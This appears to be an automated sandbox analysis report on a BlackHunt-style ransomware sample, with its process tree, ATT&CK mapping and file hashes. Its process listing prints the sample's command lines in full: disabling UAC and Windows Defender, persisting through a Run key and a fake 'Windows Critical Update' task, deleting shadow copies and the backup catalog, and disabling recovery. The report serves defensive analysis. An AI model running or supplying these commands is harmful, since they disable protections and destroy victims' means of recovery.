description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe"C:\Users\Admin\AppData\Local\Temp\992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4560 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:1224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:1224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4872
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3336
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4224
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4888
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4324
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe" /F2⤵PID:3640
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe" /F3⤵
- Creates scheduled task(s)
PID:1352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2972
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4568
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2996
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:224
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4448
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1904
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2964
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4184
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3988
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1464
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4708
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4260
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4828
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5dd29680cf35c26856bb55a5824382d47
SHA1431a40b7b9d628ea58689fc7c90e1449b28f244f
SHA2562ce409d684fb020e0a5a74dddac755c2384a30ae6d1b555c82247aa1a021ae8a
SHA5124382df7b3c61c3463faa485d3e245ecbf3f622ec25c9a6e87e015473d4b86127fcfb2d81b08527d7e9f9bc8db01edbde0011edd0352a22dc0a26250844b3231d
-
Filesize
12KB
MD50c689b4c156103f06434244163348c03
SHA1bd7d7578be812aa3e7b6d4414368008fc94c61d4
SHA256578b82fef68d4e76bdf05b01c63dfaca603cd2588c1ee8fc46c90f91f4c8665d
SHA512c91567ce5e11422c6c9d1b7c5e9dcf31c176bbe295f7e0207d684d9d52b1704681c7a6bc3582e986d5d1981e8e21a8f8815b8ceab44423a9bf4d687d03f968c1
-
Filesize
684B
MD54aebae55ff956da20599ad4c6af40399
SHA11f60061dbe8c88370c4450dfb905bf0f45af2f57
SHA256474144c979afdf1978c22c4b003daccd930916d1d5b344864fe9986976c7b616
SHA51242608594c29eac4c3aa82307be356322980911a639a0d7382298a17fd28fd66a57c2772ebc171656d622128319132c361e06af1a8556047abf4e99955be02201